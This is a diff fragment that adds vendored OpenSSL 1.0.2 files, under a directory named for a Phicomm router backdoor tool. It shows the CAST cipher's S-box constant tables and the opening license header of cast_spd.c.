+    0x494a488c, 0xb9b6a80c, 0x5c8f82bc, 0x89d36b45,
+    0x3a609437, 0xec00c9a9, 0x44715253, 0x0a874b49,
+    0xd773bc40, 0x7c34671c, 0x02717ef6, 0x4feb5536,
+    0xa2d02fff, 0xd2bf60c4, 0xd43f03c0, 0x50b4ef6d,
+    0x07478cd1, 0x006e1888, 0xa2e53f55, 0xb9e6d4bc,
+    0xa2048016, 0x97573833, 0xd7207d67, 0xde0f8f3d,
+    0x72f87b33, 0xabcc4f33, 0x7688c55d, 0x7b00a6b0,
+    0x947b0001, 0x570075d2, 0xf9bb88f8, 0x8942019e,
+    0x4264a5ff, 0x856302e0, 0x72dbd92b, 0xee971b69,
+    0x6ea22fde, 0x5f08ae2b, 0xaf7a616d, 0xe5c98767,
+    0xcf1febd2, 0x61efc8c2, 0xf1ac2571, 0xcc8239c2,
+    0x67214cb8, 0xb1e583d1, 0xb7dc3e62, 0x7f10bdce,
+    0xf90a5c38, 0x0ff0443d, 0x606e6dc6, 0x60543a49,
+    0x5727c148, 0x2be98a1d, 0x8ab41738, 0x20e1be24,
+    0xaf96da0f, 0x68458425, 0x99833be5, 0x600d457d,
+    0x282f9350, 0x8334b362, 0xd91d1120, 0x2b6d8da0,
+    0x642b1e31, 0x9c305a00, 0x52bce688, 0x1b03588a,
+    0xf7baefd5, 0x4142ed9c, 0xa4315c11, 0x83323ec5,
+    0xdfef4636, 0xa133c501, 0xe9d3531c, 0xee353783,
+};
+
+OPENSSL_GLOBAL const CAST_LONG CAST_S_table3[256] = {
+    0x9db30420, 0x1fb6e9de, 0xa7be7bef, 0xd273a298,
+    0x4a4f7bdb, 0x64ad8c57, 0x85510443, 0xfa020ed1,
+    0x7e287aff, 0xe60fb663, 0x095f35a1, 0x79ebf120,
+    0xfd059d43, 0x6497b7b1, 0xf3641f63, 0x241e4adf,
+    0x28147f5f, 0x4fa2b8cd, 0xc9430040, 0x0cc32220,
+    0xfdd30b30, 0xc0a5374f, 0x1d2d00d9, 0x24147b15,
+    0xee4d111a, 0x0fca5167, 0x71ff904c, 0x2d195ffe,
+    0x1a05645f, 0x0c13fefe, 0x081b08ca, 0x05170121,
+    0x80530100, 0xe83e5efe, 0xac9af4f8, 0x7fe72701,
+    0xd2b8ee5f, 0x06df4261, 0xbb9e9b8a, 0x7293ea25,
+    0xce84ffdf, 0xf5718801, 0x3dd64b04, 0xa26f263b,
+    0x7ed48400, 0x547eebe6, 0x446d4ca0, 0x6cf3d6f5,
+    0x2649abdf, 0xaea0c7f5, 0x36338cc1, 0x503f7e93,
+    0xd3772061, 0x11b638e1, 0x72500e03, 0xf80eb2bb,
+    0xabe0502e, 0xec8d77de, 0x57971e81, 0xe14f6746,
+    0xc9335400, 0x6920318f, 0x081dbb99, 0xffc304a5,
+    0x4d351805, 0x7f3d5ce3, 0xa6c866c6, 0x5d5bcca9,
+    0xdaec6fea, 0x9f926f91, 0x9f46222f, 0x3991467d,
+    0xa5bf6d8e, 0x1143c44f, 0x43958302, 0xd0214eeb,
+    0x022083b8, 0x3fb6180c, 0x18f8931e, 0x281658e6,
+    0x26486e3e, 0x8bd78a70, 0x7477e4c1, 0xb506e07c,
+    0xf32d0a25, 0x79098b02, 0xe4eabb81, 0x28123b23,
+    0x69dead38, 0x1574ca16, 0xdf871b62, 0x211c40b7,
+    0xa51a9ef9, 0x0014377b, 0x041e8ac8, 0x09114003,
+    0xbd59e4d2, 0xe3d156d5, 0x4fe876d5, 0x2f91a340,
+    0x557be8de, 0x00eae4a7, 0x0ce5c2ec, 0x4db4bba6,
+    0xe756bdff, 0xdd3369ac, 0xec17b035, 0x06572327,
+    0x99afc8b0, 0x56c8c391, 0x6b65811c, 0x5e146119,
+    0x6e85cb75, 0xbe07c002, 0xc2325577, 0x893ff4ec,
+    0x5bbfc92d, 0xd0ec3b25, 0xb7801ab7, 0x8d6d3b24,
+    0x20c763ef, 0xc366a5fc, 0x9c382880, 0x0ace3205,
+    0xaac9548a, 0xeca1d7c7, 0x041afa32, 0x1d16625a,
+    0x6701902c, 0x9b757a54, 0x31d477f7, 0x9126b031,
+    0x36cc6fdb, 0xc70b8b46, 0xd9e66a48, 0x56e55a79,
+    0x026a4ceb, 0x52437eff, 0x2f8f76b4, 0x0df980a5,
+    0x8674cde3, 0xedda04eb, 0x17a9be04, 0x2c18f4df,
+    0xb7747f9d, 0xab2af7b4, 0xefc34d20, 0x2e096b7c,
+    0x1741a254, 0xe5b6a035, 0x213d42f6, 0x2c1c7c26,
+    0x61c2f50f, 0x6552daf9, 0xd2c231f8, 0x25130f69,
+    0xd8167fa2, 0x0418f2c8, 0x001a96a6, 0x0d1526ab,
+    0x63315c21, 0x5e0a72ec, 0x49bafefd, 0x187908d9,
+    0x8d0dbd86, 0x311170a7, 0x3e9b640c, 0xcc3e10d7,
+    0xd5cad3b6, 0x0caec388, 0xf73001e1, 0x6c728aff,
+    0x71eae2a1, 0x1f9af36e, 0xcfcbd12f, 0xc1de8417,
+    0xac07be6b, 0xcb44a1d8, 0x8b9b0f56, 0x013988c3,
+    0xb1c52fca, 0xb4be31cd, 0xd8782806, 0x12a3a4e2,
+    0x6f7de532, 0x58fd7eb6, 0xd01ee900, 0x24adffc2,
+    0xf4990fc5, 0x9711aac5, 0x001d7b95, 0x82e5e7d2,
+    0x109873f6, 0x00613096, 0xc32d9521, 0xada121ff,
+    0x29908415, 0x7fbb977f, 0xaf9eb3db, 0x29c9ed2a,
+    0x5ce2a465, 0xa730f32c, 0xd0aa3fe8, 0x8a5cc091,
+    0xd49e2ce7, 0x0ce454a9, 0xd60acd86, 0x015f1919,
+    0x77079103, 0xdea03af6, 0x78a8565e, 0xdee356df,
+    0x21f05cbe, 0x8b75e387, 0xb3c50651, 0xb8a5c3ef,
+    0xd8eeb6d2, 0xe523be77, 0xc2154529, 0x2f69efdf,
+    0xafe67afb, 0xf470c4b2, 0xf3e0eb5b, 0xd6cc9876,
+    0x39e4460c, 0x1fda8538, 0x1987832f, 0xca007367,
+    0xa99144f8, 0x296b299e, 0x492fc295, 0x9266beab,
+    0xb5676e69, 0x9bd3ddda, 0xdf7e052f, 0xdb25701c,
+    0x1b5e51ee, 0xf65324e6, 0x6afce36c, 0x0316cc04,
+    0x8644213e, 0xb7dc59d0, 0x7965291f, 0xccd6fd43,
+    0x41823979, 0x932bcdf6, 0xb657c34d, 0x4edfd282,
+    0x7ae5290c, 0x3cb9536b, 0x851e20fe, 0x9833557e,
+    0x13ecf0b0, 0xd3ffb372, 0x3f85c5c1, 0x0aef7ed2,
+};
+
+OPENSSL_GLOBAL const CAST_LONG CAST_S_table4[256] = {
+    0x7ec90c04, 0x2c6e74b9, 0x9b0e66df, 0xa6337911,
+    0xb86a7fff, 0x1dd358f5, 0x44dd9d44, 0x1731167f,
+    0x08fbf1fa, 0xe7f511cc, 0xd2051b00, 0x735aba00,
+    0x2ab722d8, 0x386381cb, 0xacf6243a, 0x69befd7a,
+    0xe6a2e77f, 0xf0c720cd, 0xc4494816, 0xccf5c180,
+    0x38851640, 0x15b0a848, 0xe68b18cb, 0x4caadeff,
+    0x5f480a01, 0x0412b2aa, 0x259814fc, 0x41d0efe2,
+    0x4e40b48d, 0x248eb6fb, 0x8dba1cfe, 0x41a99b02,
+    0x1a550a04, 0xba8f65cb, 0x7251f4e7, 0x95a51725,
+    0xc106ecd7, 0x97a5980a, 0xc539b9aa, 0x4d79fe6a,
+    0xf2f3f763, 0x68af8040, 0xed0c9e56, 0x11b4958b,
+    0xe1eb5a88, 0x8709e6b0, 0xd7e07156, 0x4e29fea7,
+    0x6366e52d, 0x02d1c000, 0xc4ac8e05, 0x9377f571,
+    0x0c05372a, 0x578535f2, 0x2261be02, 0xd642a0c9,
+    0xdf13a280, 0x74b55bd2, 0x682199c0, 0xd421e5ec,
+    0x53fb3ce8, 0xc8adedb3, 0x28a87fc9, 0x3d959981,
+    0x5c1ff900, 0xfe38d399, 0x0c4eff0b, 0x062407ea,
+    0xaa2f4fb1, 0x4fb96976, 0x90c79505, 0xb0a8a774,
+    0xef55a1ff, 0xe59ca2c2, 0xa6b62d27, 0xe66a4263,
+    0xdf65001f, 0x0ec50966, 0xdfdd55bc, 0x29de0655,
+    0x911e739a, 0x17af8975, 0x32c7911c, 0x89f89468,
+    0x0d01e980, 0x524755f4, 0x03b63cc9, 0x0cc844b2,
+    0xbcf3f0aa, 0x87ac36e9, 0xe53a7426, 0x01b3d82b,
+    0x1a9e7449, 0x64ee2d7e, 0xcddbb1da, 0x01c94910,
+    0xb868bf80, 0x0d26f3fd, 0x9342ede7, 0x04a5c284,
+    0x636737b6, 0x50f5b616, 0xf24766e3, 0x8eca36c1,
+    0x136e05db, 0xfef18391, 0xfb887a37, 0xd6e7f7d4,
+    0xc7fb7dc9, 0x3063fcdf, 0xb6f589de, 0xec2941da,
+    0x26e46695, 0xb7566419, 0xf654efc5, 0xd08d58b7,
+    0x48925401, 0xc1bacb7f, 0xe5ff550f, 0xb6083049,
+    0x5bb5d0e8, 0x87d72e5a, 0xab6a6ee1, 0x223a66ce,
+    0xc62bf3cd, 0x9e0885f9, 0x68cb3e47, 0x086c010f,
+    0xa21de820, 0xd18b69de, 0xf3f65777, 0xfa02c3f6,
+    0x407edac3, 0xcbb3d550, 0x1793084d, 0xb0d70eba,
+    0x0ab378d5, 0xd951fb0c, 0xded7da56, 0x4124bbe4,
+    0x94ca0b56, 0x0f5755d1, 0xe0e1e56e, 0x6184b5be,
+    0x580a249f, 0x94f74bc0, 0xe327888e, 0x9f7b5561,
+    0xc3dc0280, 0x05687715, 0x646c6bd7, 0x44904db3,
+    0x66b4f0a3, 0xc0f1648a, 0x697ed5af, 0x49e92ff6,
+    0x309e374f, 0x2cb6356a, 0x85808573, 0x4991f840,
+    0x76f0ae02, 0x083be84d, 0x28421c9a, 0x44489406,
+    0x736e4cb8, 0xc1092910, 0x8bc95fc6, 0x7d869cf4,
+    0x134f616f, 0x2e77118d, 0xb31b2be1, 0xaa90b472,
+    0x3ca5d717, 0x7d161bba, 0x9cad9010, 0xaf462ba2,
+    0x9fe459d2, 0x45d34559, 0xd9f2da13, 0xdbc65487,
+    0xf3e4f94e, 0x176d486f, 0x097c13ea, 0x631da5c7,
+    0x445f7382, 0x175683f4, 0xcdc66a97, 0x70be0288,
+    0xb3cdcf72, 0x6e5dd2f3, 0x20936079, 0x459b80a5,
+    0xbe60e2db, 0xa9c23101, 0xeba5315c, 0x224e42f2,
+    0x1c5c1572, 0xf6721b2c, 0x1ad2fff3, 0x8c25404e,
+    0x324ed72f, 0x4067b7fd, 0x0523138e, 0x5ca3bc78,
+    0xdc0fd66e, 0x75922283, 0x784d6b17, 0x58ebb16e,
+    0x44094f85, 0x3f481d87, 0xfcfeae7b, 0x77b5ff76,
+    0x8c2302bf, 0xaaf47556, 0x5f46b02a, 0x2b092801,
+    0x3d38f5f7, 0x0ca81f36, 0x52af4a8a, 0x66d5e7c0,
+    0xdf3b0874, 0x95055110, 0x1b5ad7a8, 0xf61ed5ad,
+    0x6cf6e479, 0x20758184, 0xd0cefa65, 0x88f7be58,
+    0x4a046826, 0x0ff6f8f3, 0xa09c7f70, 0x5346aba0,
+    0x5ce96c28, 0xe176eda3, 0x6bac307f, 0x376829d2,
+    0x85360fa9, 0x17e3fe2a, 0x24b79767, 0xf5a96b20,
+    0xd6cd2595, 0x68ff1ebf, 0x7555442c, 0xf19f06be,
+    0xf9e0659a, 0xeeb9491d, 0x34010718, 0xbb30cab8,
+    0xe822fe15, 0x88570983, 0x750e6249, 0xda627e55,
+    0x5e76ffa8, 0xb1534546, 0x6d47de08, 0xefe9e7d4,
+};
+
+OPENSSL_GLOBAL const CAST_LONG CAST_S_table5[256] = {
+    0xf6fa8f9d, 0x2cac6ce1, 0x4ca34867, 0xe2337f7c,
+    0x95db08e7, 0x016843b4, 0xeced5cbc, 0x325553ac,
+    0xbf9f0960, 0xdfa1e2ed, 0x83f0579d, 0x63ed86b9,
+    0x1ab6a6b8, 0xde5ebe39, 0xf38ff732, 0x8989b138,
+    0x33f14961, 0xc01937bd, 0xf506c6da, 0xe4625e7e,
+    0xa308ea99, 0x4e23e33c, 0x79cbd7cc, 0x48a14367,
+    0xa3149619, 0xfec94bd5, 0xa114174a, 0xeaa01866,
+    0xa084db2d, 0x09a8486f, 0xa888614a, 0x2900af98,
+    0x01665991, 0xe1992863, 0xc8f30c60, 0x2e78ef3c,
+    0xd0d51932, 0xcf0fec14, 0xf7ca07d2, 0xd0a82072,
+    0xfd41197e, 0x9305a6b0, 0xe86be3da, 0x74bed3cd,
+    0x372da53c, 0x4c7f4448, 0xdab5d440, 0x6dba0ec3,
+    0x083919a7, 0x9fbaeed9, 0x49dbcfb0, 0x4e670c53,
+    0x5c3d9c01, 0x64bdb941, 0x2c0e636a, 0xba7dd9cd,
+    0xea6f7388, 0xe70bc762, 0x35f29adb, 0x5c4cdd8d,
+    0xf0d48d8c, 0xb88153e2, 0x08a19866, 0x1ae2eac8,
+    0x284caf89, 0xaa928223, 0x9334be53, 0x3b3a21bf,
+    0x16434be3, 0x9aea3906, 0xefe8c36e, 0xf890cdd9,
+    0x80226dae, 0xc340a4a3, 0xdf7e9c09, 0xa694a807,
+    0x5b7c5ecc, 0x221db3a6, 0x9a69a02f, 0x68818a54,
+    0xceb2296f, 0x53c0843a, 0xfe893655, 0x25bfe68a,
+    0xb4628abc, 0xcf222ebf, 0x25ac6f48, 0xa9a99387,
+    0x53bddb65, 0xe76ffbe7, 0xe967fd78, 0x0ba93563,
+    0x8e342bc1, 0xe8a11be9, 0x4980740d, 0xc8087dfc,
+    0x8de4bf99, 0xa11101a0, 0x7fd37975, 0xda5a26c0,
+    0xe81f994f, 0x9528cd89, 0xfd339fed, 0xb87834bf,
+    0x5f04456d, 0x22258698, 0xc9c4c83b, 0x2dc156be,
+    0x4f628daa, 0x57f55ec5, 0xe2220abe, 0xd2916ebf,
+    0x4ec75b95, 0x24f2c3c0, 0x42d15d99, 0xcd0d7fa0,
+    0x7b6e27ff, 0xa8dc8af0, 0x7345c106, 0xf41e232f,
+    0x35162386, 0xe6ea8926, 0x3333b094, 0x157ec6f2,
+    0x372b74af, 0x692573e4, 0xe9a9d848, 0xf3160289,
+    0x3a62ef1d, 0xa787e238, 0xf3a5f676, 0x74364853,
+    0x20951063, 0x4576698d, 0xb6fad407, 0x592af950,
+    0x36f73523, 0x4cfb6e87, 0x7da4cec0, 0x6c152daa,
+    0xcb0396a8, 0xc50dfe5d, 0xfcd707ab, 0x0921c42f,
+    0x89dff0bb, 0x5fe2be78, 0x448f4f33, 0x754613c9,
+    0x2b05d08d, 0x48b9d585, 0xdc049441, 0xc8098f9b,
+    0x7dede786, 0xc39a3373, 0x42410005, 0x6a091751,
+    0x0ef3c8a6, 0x890072d6, 0x28207682, 0xa9a9f7be,
+    0xbf32679d, 0xd45b5b75, 0xb353fd00, 0xcbb0e358,
+    0x830f220a, 0x1f8fb214, 0xd372cf08, 0xcc3c4a13,
+    0x8cf63166, 0x061c87be, 0x88c98f88, 0x6062e397,
+    0x47cf8e7a, 0xb6c85283, 0x3cc2acfb, 0x3fc06976,
+    0x4e8f0252, 0x64d8314d, 0xda3870e3, 0x1e665459,
+    0xc10908f0, 0x513021a5, 0x6c5b68b7, 0x822f8aa0,
+    0x3007cd3e, 0x74719eef, 0xdc872681, 0x073340d4,
+    0x7e432fd9, 0x0c5ec241, 0x8809286c, 0xf592d891,
+    0x08a930f6, 0x957ef305, 0xb7fbffbd, 0xc266e96f,
+    0x6fe4ac98, 0xb173ecc0, 0xbc60b42a, 0x953498da,
+    0xfba1ae12, 0x2d4bd736, 0x0f25faab, 0xa4f3fceb,
+    0xe2969123, 0x257f0c3d, 0x9348af49, 0x361400bc,
+    0xe8816f4a, 0x3814f200, 0xa3f94043, 0x9c7a54c2,
+    0xbc704f57, 0xda41e7f9, 0xc25ad33a, 0x54f4a084,
+    0xb17f5505, 0x59357cbe, 0xedbd15c8, 0x7f97c5ab,
+    0xba5ac7b5, 0xb6f6deaf, 0x3a479c3a, 0x5302da25,
+    0x653d7e6a, 0x54268d49, 0x51a477ea, 0x5017d55b,
+    0xd7d25d88, 0x44136c76, 0x0404a8c8, 0xb8e5a121,
+    0xb81a928a, 0x60ed5869, 0x97c55b96, 0xeaec991b,
+    0x29935913, 0x01fdb7f1, 0x088e8dfa, 0x9ab6f6f5,
+    0x3b4cbf9f, 0x4a5de3ab, 0xe6051d35, 0xa0e1d855,
+    0xd36b4cf1, 0xf544edeb, 0xb0e93524, 0xbebb8fbd,
+    0xa2d762cf, 0x49c92f54, 0x38b5f331, 0x7128a454,
+    0x48392905, 0xa65b1db8, 0x851c97bd, 0xd675cf2f,
+};
+
+OPENSSL_GLOBAL const CAST_LONG CAST_S_table6[256] = {
+    0x85e04019, 0x332bf567, 0x662dbfff, 0xcfc65693,
+    0x2a8d7f6f, 0xab9bc912, 0xde6008a1, 0x2028da1f,
+    0x0227bce7, 0x4d642916, 0x18fac300, 0x50f18b82,
+    0x2cb2cb11, 0xb232e75c, 0x4b3695f2, 0xb28707de,
+    0xa05fbcf6, 0xcd4181e9, 0xe150210c, 0xe24ef1bd,
+    0xb168c381, 0xfde4e789, 0x5c79b0d8, 0x1e8bfd43,
+    0x4d495001, 0x38be4341, 0x913cee1d, 0x92a79c3f,
+    0x089766be, 0xbaeeadf4, 0x1286becf, 0xb6eacb19,
+    0x2660c200, 0x7565bde4, 0x64241f7a, 0x8248dca9,
+    0xc3b3ad66, 0x28136086, 0x0bd8dfa8, 0x356d1cf2,
+    0x107789be, 0xb3b2e9ce, 0x0502aa8f, 0x0bc0351e,
+    0x166bf52a, 0xeb12ff82, 0xe3486911, 0xd34d7516,
+    0x4e7b3aff, 0x5f43671b, 0x9cf6e037, 0x4981ac83,
+    0x334266ce, 0x8c9341b7, 0xd0d854c0, 0xcb3a6c88,
+    0x47bc2829, 0x4725ba37, 0xa66ad22b, 0x7ad61f1e,
+    0x0c5cbafa, 0x4437f107, 0xb6e79962, 0x42d2d816,
+    0x0a961288, 0xe1a5c06e, 0x13749e67, 0x72fc081a,
+    0xb1d139f7, 0xf9583745, 0xcf19df58, 0xbec3f756,
+    0xc06eba30, 0x07211b24, 0x45c28829, 0xc95e317f,
+    0xbc8ec511, 0x38bc46e9, 0xc6e6fa14, 0xbae8584a,
+    0xad4ebc46, 0x468f508b, 0x7829435f, 0xf124183b,
+    0x821dba9f, 0xaff60ff4, 0xea2c4e6d, 0x16e39264,
+    0x92544a8b, 0x009b4fc3, 0xaba68ced, 0x9ac96f78,
+    0x06a5b79a, 0xb2856e6e, 0x1aec3ca9, 0xbe838688,
+    0x0e0804e9, 0x55f1be56, 0xe7e5363b, 0xb3a1f25d,
+    0xf7debb85, 0x61fe033c, 0x16746233, 0x3c034c28,
+    0xda6d0c74, 0x79aac56c, 0x3ce4e1ad, 0x51f0c802,
+    0x98f8f35a, 0x1626a49f, 0xeed82b29, 0x1d382fe3,
+    0x0c4fb99a, 0xbb325778, 0x3ec6d97b, 0x6e77a6a9,
+    0xcb658b5c, 0xd45230c7, 0x2bd1408b, 0x60c03eb7,
+    0xb9068d78, 0xa33754f4, 0xf430c87d, 0xc8a71302,
+    0xb96d8c32, 0xebd4e7be, 0xbe8b9d2d, 0x7979fb06,
+    0xe7225308, 0x8b75cf77, 0x11ef8da4, 0xe083c858,
+    0x8d6b786f, 0x5a6317a6, 0xfa5cf7a0, 0x5dda0033,
+    0xf28ebfb0, 0xf5b9c310, 0xa0eac280, 0x08b9767a,
+    0xa3d9d2b0, 0x79d34217, 0x021a718d, 0x9ac6336a,
+    0x2711fd60, 0x438050e3, 0x069908a8, 0x3d7fedc4,
+    0x826d2bef, 0x4eeb8476, 0x488dcf25, 0x36c9d566,
+    0x28e74e41, 0xc2610aca, 0x3d49a9cf, 0xbae3b9df,
+    0xb65f8de6, 0x92aeaf64, 0x3ac7d5e6, 0x9ea80509,
+    0xf22b017d, 0xa4173f70, 0xdd1e16c3, 0x15e0d7f9,
+    0x50b1b887, 0x2b9f4fd5, 0x625aba82, 0x6a017962,
+    0x2ec01b9c, 0x15488aa9, 0xd716e740, 0x40055a2c,
+    0x93d29a22, 0xe32dbf9a, 0x058745b9, 0x3453dc1e,
+    0xd699296e, 0x496cff6f, 0x1c9f4986, 0xdfe2ed07,
+    0xb87242d1, 0x19de7eae, 0x053e561a, 0x15ad6f8c,
+    0x66626c1c, 0x7154c24c, 0xea082b2a, 0x93eb2939,
+    0x17dcb0f0, 0x58d4f2ae, 0x9ea294fb, 0x52cf564c,
+    0x9883fe66, 0x2ec40581, 0x763953c3, 0x01d6692e,
+    0xd3a0c108, 0xa1e7160e, 0xe4f2dfa6, 0x693ed285,
+    0x74904698, 0x4c2b0edd, 0x4f757656, 0x5d393378,
+    0xa132234f, 0x3d321c5d, 0xc3f5e194, 0x4b269301,
+    0xc79f022f, 0x3c997e7e, 0x5e4f9504, 0x3ffafbbd,
+    0x76f7ad0e, 0x296693f4, 0x3d1fce6f, 0xc61e45be,
+    0xd3b5ab34, 0xf72bf9b7, 0x1b0434c0, 0x4e72b567,
+    0x5592a33d, 0xb5229301, 0xcfd2a87f, 0x60aeb767,
+    0x1814386b, 0x30bcc33d, 0x38a0c07d, 0xfd1606f2,
+    0xc363519b, 0x589dd390, 0x5479f8e6, 0x1cb8d647,
+    0x97fd61a9, 0xea7759f4, 0x2d57539d, 0x569a58cf,
+    0xe84e63ad, 0x462e1b78, 0x6580f87e, 0xf3817914,
+    0x91da55f4, 0x40a230f3, 0xd1988f35, 0xb6e318d2,
+    0x3ffa50bc, 0x3d40f021, 0xc3c0bdae, 0x4958c24c,
+    0x518f36b2, 0x84b1d370, 0x0fedce83, 0x878ddada,
+    0xf2a279c7, 0x94e01be8, 0x90716f4b, 0x954b8aa3,
+};
+
+OPENSSL_GLOBAL const CAST_LONG CAST_S_table7[256] = {
+    0xe216300d, 0xbbddfffc, 0xa7ebdabd, 0x35648095,
+    0x7789f8b7, 0xe6c1121b, 0x0e241600, 0x052ce8b5,
+    0x11a9cfb0, 0xe5952f11, 0xece7990a, 0x9386d174,
+    0x2a42931c, 0x76e38111, 0xb12def3a, 0x37ddddfc,
+    0xde9adeb1, 0x0a0cc32c, 0xbe197029, 0x84a00940,
+    0xbb243a0f, 0xb4d137cf, 0xb44e79f0, 0x049eedfd,
+    0x0b15a15d, 0x480d3168, 0x8bbbde5a, 0x669ded42,
+    0xc7ece831, 0x3f8f95e7, 0x72df191b, 0x7580330d,
+    0x94074251, 0x5c7dcdfa, 0xabbe6d63, 0xaa402164,
+    0xb301d40a, 0x02e7d1ca, 0x53571dae, 0x7a3182a2,
+    0x12a8ddec, 0xfdaa335d, 0x176f43e8, 0x71fb46d4,
+    0x38129022, 0xce949ad4, 0xb84769ad, 0x965bd862,
+    0x82f3d055, 0x66fb9767, 0x15b80b4e, 0x1d5b47a0,
+    0x4cfde06f, 0xc28ec4b8, 0x57e8726e, 0x647a78fc,
+    0x99865d44, 0x608bd593, 0x6c200e03, 0x39dc5ff6,
+    0x5d0b00a3, 0xae63aff2, 0x7e8bd632, 0x70108c0c,
+    0xbbd35049, 0x2998df04, 0x980cf42a, 0x9b6df491,
+    0x9e7edd53, 0x06918548, 0x58cb7e07, 0x3b74ef2e,
+    0x522fffb1, 0xd24708cc, 0x1c7e27cd, 0xa4eb215b,
+    0x3cf1d2e2, 0x19b47a38, 0x424f7618, 0x35856039,
+    0x9d17dee7, 0x27eb35e6, 0xc9aff67b, 0x36baf5b8,
+    0x09c467cd, 0xc18910b1, 0xe11dbf7b, 0x06cd1af8,
+    0x7170c608, 0x2d5e3354, 0xd4de495a, 0x64c6d006,
+    0xbcc0c62c, 0x3dd00db3, 0x708f8f34, 0x77d51b42,
+    0x264f620f, 0x24b8d2bf, 0x15c1b79e, 0x46a52564,
+    0xf8d7e54e, 0x3e378160, 0x7895cda5, 0x859c15a5,
+    0xe6459788, 0xc37bc75f, 0xdb07ba0c, 0x0676a3ab,
+    0x7f229b1e, 0x31842e7b, 0x24259fd7, 0xf8bef472,
+    0x835ffcb8, 0x6df4c1f2, 0x96f5b195, 0xfd0af0fc,
+    0xb0fe134c, 0xe2506d3d, 0x4f9b12ea, 0xf215f225,
+    0xa223736f, 0x9fb4c428, 0x25d04979, 0x34c713f8,
+    0xc4618187, 0xea7a6e98, 0x7cd16efc, 0x1436876c,
+    0xf1544107, 0xbedeee14, 0x56e9af27, 0xa04aa441,
+    0x3cf7c899, 0x92ecbae6, 0xdd67016d, 0x151682eb,
+    0xa842eedf, 0xfdba60b4, 0xf1907b75, 0x20e3030f,
+    0x24d8c29e, 0xe139673b, 0xefa63fb8, 0x71873054,
+    0xb6f2cf3b, 0x9f326442, 0xcb15a4cc, 0xb01a4504,
+    0xf1e47d8d, 0x844a1be5, 0xbae7dfdc, 0x42cbda70,
+    0xcd7dae0a, 0x57e85b7a, 0xd53f5af6, 0x20cf4d8c,
+    0xcea4d428, 0x79d130a4, 0x3486ebfb, 0x33d3cddc,
+    0x77853b53, 0x37effcb5, 0xc5068778, 0xe580b3e6,
+    0x4e68b8f4, 0xc5c8b37e, 0x0d809ea2, 0x398feb7c,
+    0x132a4f94, 0x43b7950e, 0x2fee7d1c, 0x223613bd,
+    0xdd06caa2, 0x37df932b, 0xc4248289, 0xacf3ebc3,
+    0x5715f6b7, 0xef3478dd, 0xf267616f, 0xc148cbe4,
+    0x9052815e, 0x5e410fab, 0xb48a2465, 0x2eda7fa4,
+    0xe87b40e4, 0xe98ea084, 0x5889e9e1, 0xefd390fc,
+    0xdd07d35b, 0xdb485694, 0x38d7e5b2, 0x57720101,
+    0x730edebc, 0x5b643113, 0x94917e4f, 0x503c2fba,
+    0x646f1282, 0x7523d24a, 0xe0779695, 0xf9c17a8f,
+    0x7a5b2121, 0xd187b896, 0x29263a4d, 0xba510cdf,
+    0x81f47c9f, 0xad1163ed, 0xea7b5965, 0x1a00726e,
+    0x11403092, 0x00da6d77, 0x4a0cdd61, 0xad1f4603,
+    0x605bdfb0, 0x9eedc364, 0x22ebe6a8, 0xcee7d28a,
+    0xa0e736a0, 0x5564a6b9, 0x10853209, 0xc7eb8f37,
+    0x2de705ca, 0x8951570f, 0xdf09822b, 0xbd691a6c,
+    0xaa12e4f2, 0x87451c0f, 0xe0f6a27a, 0x3ada4819,
+    0x4cf1764f, 0x0d771c2b, 0x67cdb156, 0x350d8384,
+    0x5938fa0f, 0x42399ef3, 0x36997b07, 0x0e84093d,
+    0x4aa93e61, 0x8360d87b, 0x1fa98b0c, 0x1149382c,
+    0xe97625a5, 0x0614d1b7, 0x0e25244b, 0x0c768347,
+    0x589e8d82, 0x0d2059d1, 0xa466bb1e, 0xf8da0a82,
+    0x04f19130, 0xba6e4ec0, 0x99265164, 0x1ee7230d,
+    0x50b2ad80, 0xeaee6801, 0x8db2a283, 0xea8bf59e,
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast_spd.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast_spd.c
new file mode 100644
index 0000000..91d2ce2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast_spd.c
@@ -0,0 +1,262 @@
+/* crypto/cast/cast_spd.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
